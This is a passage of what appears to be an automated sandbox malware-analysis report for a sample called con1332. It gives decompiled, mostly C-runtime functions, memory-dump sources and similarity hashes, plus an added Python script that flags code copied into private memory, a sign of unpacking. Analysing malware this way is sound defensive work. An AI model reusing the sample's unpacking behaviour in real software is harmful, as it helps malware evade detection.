		E0040E744(__edx, _t40, 0);
		_t19 = _t40;
	}
	return E0040E21D(_t19);
}
0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
                                                                                                                                                                                                                                    0x0040c6eb
                                                                                                                                                                                                                                    0x0040c714
                                                                                                                                                                                                                                    0x0040c71b
                                                                                                                                                                                                                                    0x0040c71e
                                                                                                                                                                                                                                    0x0040c725
                                                                                                                                                                                                                                    0x0040c72a
                                                                                                                                                                                                                                    0x0040c72a
                                                                                                                                                                                                                                    0x0040c6ac
                                                                                                                                                                                                                                    0x0040c6ac
                                                                                                                                                                                                                                    0x0040c6b3
                                                                                                                                                                                                                                    0x0040c6b4
                                                                                                                                                                                                                                    0x0040c6b6
                                                                                                                                                                                                                                    0x0040c6b7
                                                                                                                                                                                                                                    0x0040c6b8
                                                                                                                                                                                                                                    0x0040c6b9
                                                                                                                                                                                                                                    0x0040c6ba
                                                                                                                                                                                                                                    0x0040c6bb
                                                                                                                                                                                                                                    0x0040c6c3
                                                                                                                                                                                                                                    0x0040c6c3
                                                                                                                                                                                                                                    0x0040c731

APIs
• __lock_file.LIBCMT ref: 0040C6C8
• __fileno.LIBCMT ref: 0040C6D6
• __fileno.LIBCMT ref: 0040C6E2
• __fileno.LIBCMT ref: 0040C6EE
• __fileno.LIBCMT ref: 0040C6FE
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
• String ID:
• API String ID: 2805327698-0
• Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
• Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
• Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
• Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
	signed int _t15;
	LONG* _t21;
	long _t23;
	void* _t31;
	LONG* _t33;
	void* _t34;
	void* _t35;

	_t35 = __eflags;
	_t29 = __edx;
	_t25 = __ebx;
	_push(0xc);
	_push(0x421490);
	E0040E1D8(__ebx, __edi, __esi);
	_t31 = E00410735(__ebx, __edx, __edi, _t35);
	_t15 =  *0x422e34; // 0xfffffffe
	if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
		E0040D6E0(_t25, 0xd);
		 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
		_t33 =  *(_t31 + 0x68);
		 *(_t34 - 0x1c) = _t33;
		__eflags = _t33 -  *0x422d38; // 0x4741638
		if(__eflags != 0) {
			__eflags = _t33;
			if(_t33 != 0) {
				_t23 = InterlockedDecrement(_t33);
				__eflags = _t23;
				if(_t23 == 0) {
					__eflags = _t33 - 0x422910;
					if(__eflags != 0) {
						_push(_t33);
						E0040B6B5(_t25, _t31, _t33, __eflags);
					}
				}
			}
			_t21 =  *0x422d38; // 0x4741638
			 *(_t31 + 0x68) = _t21;
			_t33 =  *0x422d38; // 0x4741638
			 *(_t34 - 0x1c) = _t33;
			InterlockedIncrement(_t33);
		}
		 *(_t34 - 4) = 0xfffffffe;
		E00414067();
	} else {
		_t33 =  *(_t31 + 0x68);
	}
	if(_t33 == 0) {
		E0040E79A(_t29, _t31, 0x20);
	}
	return E0040E21D(_t33);
}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
                                                                                                                                                                                                                                    0x00414046
                                                                                                                                                                                                                                    0x0041404c
                                                                                                                                                                                                                                    0x00414050
                                                                                                                                                                                                                                    0x00414050
                                                                                                                                                                                                                                    0x00414056
                                                                                                                                                                                                                                    0x0041405d
                                                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                                                    0x00413ff4
                                                                                                                                                                                                                                    0x00413ff8
                                                                                                                                                                                                                                    0x00413ffd
                                                                                                                                                                                                                                    0x00414005

APIs
• __getptd.LIBCMT ref: 00413FD8
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __amsg_exit.LIBCMT ref: 00413FF8
• __lock.LIBCMT ref: 00414008
• InterlockedDecrement.KERNEL32(?), ref: 00414025
• InterlockedIncrement.KERNEL32(04741638), ref: 00414050
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
• Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 02C0423F
  • Part of subcall function 02C0099C: __getptd_noexit.LIBCMT ref: 02C0099F
  • Part of subcall function 02C0099C: __amsg_exit.LIBCMT ref: 02C009AC
• __amsg_exit.LIBCMT ref: 02C0425F
• __lock.LIBCMT ref: 02C0426F
• InterlockedDecrement.KERNEL32(?), ref: 02C0428C
• InterlockedIncrement.KERNEL32(00422D38), ref: 02C042B7
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction ID: 250c76bf525b6a3d00094603b3682799b3303a4b921b8c8f9cd99b4371448a6d
• Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction Fuzzy Hash: 2301D231F01621EBD739AB64D8847AFB760BF8C724F454055EA20A72E0C774AA81DFD9
Uniqueness
Uniqueness Score: -1.00%

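The two blocks above carry the same Opcode ID (75ed1ba7...) and the same API set, but come from different memory regions: the first from the dump at 0x00400000 that is backed by a PE image, the second from the region at 0x02BF0000 that is not. The Instruction IDs differ because operands (for example the InterlockedIncrement argument, 04741638 versus 00422D38) were relocated. When triaging a report of this size it is useful to pull those relationships out automatically: functions whose opcode hash shows up in both a PE-backed and a non-PE region are evidence of code copied into a fresh allocation, and functions whose only imports are LIBCMT internals plus Interlocked* helpers are CRT boilerplate that can be deprioritised. The script below is an added example written for this page, not a Joe Sandbox tool; it parses the report's own block layout (the "•" bullet lines, "Source File: ..., Offset: ..., based on PE: ..." and "Opcode ID:" fields) from a constructed sample copied in shape from the blocks above. The CRT-boilerplate rule and the module/helper allowlist are heuristics chosen for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: three function blocks in the shape the report uses.
# Two share an Opcode ID across a PE-backed and a non-PE dump; the third
# has no API references at all.
SAMPLE_REPORT = """\
APIs
• __getptd.LIBCMT ref: 00413FD8
• __lock.LIBCMT ref: 00414008
• InterlockedDecrement.KERNEL32(?), ref: 00414025
• InterlockedIncrement.KERNEL32(04741638), ref: 00414050
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 02C0423F
• __lock.LIBCMT ref: 02C0426F
• InterlockedDecrement.KERNEL32(?), ref: 02C0428C
• InterlockedIncrement.KERNEL32(00422D38), ref: 02C042B7
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
• Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction ID: 250c76bf525b6a3d00094603b3682799b3303a4b921b8c8f9cd99b4371448a6d
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
• Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
• Instruction ID: 6edb8640f239807636c8a6a498f953e1f020d16960245c84a3f0d053192f0fcf
Uniqueness Score: -1.00%
"""


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)  # (api_name, module) pairs
    source_file: str = ""
    offset: int = 0
    pe_backed: bool = False
    opcode_id: str = ""
    instruction_id: str = ""


# "• __getptd.LIBCMT ref: 00413FD8" / "• InterlockedDecrement.KERNEL32(?), ref: ..."
API_RE = re.compile(r"^•\s+([A-Za-z_][A-Za-z_0-9]*)\.([A-Z0-9]+)")
SOURCE_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
OPCODE_RE = re.compile(r"Opcode ID: ([0-9a-f]{64})")
INSTR_RE = re.compile(r"Instruction ID: ([0-9a-f]{64})")


def parse_blocks(text):
    """Split the report text on blank lines and pull the fields out of each block."""
    blocks = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        fb = FunctionBlock()
        for raw in chunk.splitlines():
            line = raw.strip()
            m = API_RE.match(line)
            if m and " ref: " in line:
                fb.apis.append((m.group(1), m.group(2)))
                continue
            m = SOURCE_RE.search(line)
            if m:
                fb.source_file, fb.offset = m.group(1), int(m.group(2), 16)
                fb.pe_backed = m.group(3) == "true"
                continue
            m = OPCODE_RE.search(line)
            if m:
                fb.opcode_id = m.group(1)
                continue
            m = INSTR_RE.search(line)
            if m:
                fb.instruction_id = m.group(1)
        blocks.append(fb)
    return blocks


def relocated_functions(blocks):
    """Opcode IDs seen in both a PE-backed region and a non-PE region (sorted)."""
    kinds = {}
    for b in blocks:
        if b.opcode_id:
            kinds.setdefault(b.opcode_id, set()).add(b.pe_backed)
    return sorted(o for o, k in kinds.items() if k == {True, False})


# Heuristic allowlist chosen for this example: CRT-internal modules and the
# Interlocked* helpers the CRT's own lock bookkeeping uses.
CRT_MODULES = {"LIBCMT", "MSVCRT"}
SYNC_HELPERS = {"InterlockedIncrement", "InterlockedDecrement",
                "InterlockedExchange", "InterlockedCompareExchange"}


def is_crt_boilerplate(block):
    """True when every API reference is CRT-internal; False when there is nothing to judge."""
    if not block.apis:
        return False
    return all(mod in CRT_MODULES or name in SYNC_HELPERS for name, mod in block.apis)


if __name__ == "__main__":
    blocks = parse_blocks(SAMPLE_REPORT)
    for b in blocks:
        print(f"{b.offset:#010x} pe={b.pe_backed} crt={is_crt_boilerplate(b)} opcode={b.opcode_id[:12]}")
    print("relocated:", relocated_functions(blocks))
```

Run it on the full report text instead of SAMPLE_REPORT and the relocated list becomes the set of functions worth opening first: code that exists both in the on-disk image and in a private allocation is the unpacking seam, and everything tagged as CRT boilerplate can be skipped.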
Strings
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID:
• String ID: $2$l
• API String ID: 0-3132104027
• Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
• Instruction ID: 6edb8640f239807636c8a6a498f953e1f020d16960245c84a3f0d053192f0fcf
• Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
• Instruction Fuzzy Hash: B8419D35C552A98EDF358A268CC83F8FBB2AB4131AF1801CAC49D6A1D1C7B54B86CF45
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: __calloc_crt
• String ID: P$B$`$B
• API String ID: 3494438863-235554963
• Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
• Instruction ID: a846b63a456e3a2ef09bb559dd29c6a90dc9e0465c0ad1fab158db80500776d7
• Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
• Instruction Fuzzy Hash: 651129373086255BE7648F2CBC50B753392EB84328B68527AE715CB6E4EB70D8874A48
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 65%
#include <windows.h>

/* Decompiler output for the function at 0x00413610. It asks KERNEL32 for
   the IsProcessorFeaturePresent export and, when that lookup fails, falls
   back to an x87 arithmetic test on two double constants read from
   0x41fb48 / 0x41fb50. The listing stops inside the GetProcAddress branch;
   the page carries nothing past that point. */
E00413610() {
    signed long long _v12;
    signed int _v20;
    signed long long _v28;
    signed char _t8;

    _t8 = GetModuleHandleA("KERNEL32");
    if(_t8 == 0) {
        L6:
        /* Fallback: divide and multiply two constants from .rdata and
           compare the result with 1.0 on the x87 stack. */
        _v20 =  *0x41fb50;
        _v28 =  *0x41fb48;
        asm("fsubr qword [ebp-0x18]");
        _v12 = _v28 / _v20 * _v20;
        asm("fld1");
        asm("fcomp qword [ebp-0x8]");
        asm("fnstsw ax");
        /* The decompiler reuses _t8 for AX after FNSTSW: C0 or C2 set
           (mask 0x5) means the compare was "not equal" or unordered. */
        if((_t8 & 0x00000005) != 0) {
            return 0;
        } else {
            return 1;
        }
    } else {
        /* Preferred path: resolve the export at run time rather than importing it. */
        __eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
        if(__eax == 0) {
            goto L6;
        } else {
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						return __eax;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

APIs
• GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
Strings
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591
• Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
• Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
• Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
• Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(?), ref: 02BF1B6D
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 02BF1B96
• GetLastError.KERNEL32 ref: 02BF1BA7
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02BF1BBF
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02BF1BE7
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLastlstrlen
• String ID:
• API String ID: 3322701435-0
• Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction ID: 45e0a846e73360d13d32198de8f6fb62db6b9734b61efff310776b985f058832
• Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction Fuzzy Hash: 3B11C431100354FBD3309B59CC88F677F6CEB86BA9F008594FE599A281D721A808C6B4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                    				char _t82;
                                                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                    				signed char _t98;
                                                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                                                                                    				intOrPtr _t115;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t105 = __esi;
                                                                                                                                                                                                                                    				_t97 = __edx;
                                                                                                                                                                                                                                    				_t104 = _a4;
                                                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                                                    				_t121 = _t104;
                                                                                                                                                                                                                                    				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
                                                                                                                                                                                                                                    								__eflags = _t103 - _t115;
                                                                                                                                                                                                                                    							} while (_t103 < _t115);
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				 *_t86 = 0x16;
                                                                                                                                                                                                                                    				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x0040c884
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c884
                                                                                                                                                                                                                                    0x0040c82b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c82b
                                                                                                                                                                                                                                    0x0040c7fe
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7fe
                                                                                                                                                                                                                                    0x0040c80a
                                                                                                                                                                                                                                    0x0040c80f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c80f
                                                                                                                                                                                                                                    0x0040c7ce
                                                                                                                                                                                                                                    0x0040c7d8
                                                                                                                                                                                                                                    0x0040c7db
                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7e2
                                                                                                                                                                                                                                    0x0040c7e4
                                                                                                                                                                                                                                    0x0040c7e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7e8
                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                    0x0040c7ed
                                                                                                                                                                                                                                    0x0040c7ef
                                                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                                                    0x0040c7f4
                                                                                                                                                                                                                                    0x0040c7f5
                                                                                                                                                                                                                                    0x0040c7f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7ab
                                                                                                                                                                                                                                    0x0040c79e
                                                                                                                                                                                                                                    0x0040c75b
                                                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                                                    0x0040c761
                                                                                                                                                                                                                                    0x0040c762
                                                                                                                                                                                                                                    0x0040c763
                                                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                                                    0x0040c765
                                                                                                                                                                                                                                    0x0040c76b
                                                                                                                                                                                                                                    0x00000000

APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0
• Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
• Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
Uniqueness

Uniqueness Score: -1.00%

APIs
• __fileno.LIBCMT ref: 02BFC9E3
• __locking.LIBCMT ref: 02BFC9F8
  • Part of subcall function 02BFC228: __getptd_noexit.LIBCMT ref: 02BFC228
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: __fileno__getptd_noexit__locking
• String ID:
• API String ID: 630670418-0
• Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction ID: ea84130f37afed3e7404d9a72e2db1063a92f03943b3df2caefed8d44c0083f1
• Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction Fuzzy Hash: F751A475E0020DAFDB51DF68C980B59BFB1EF05358F1481E6DA25A7285D730AAD9CB80
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 97%
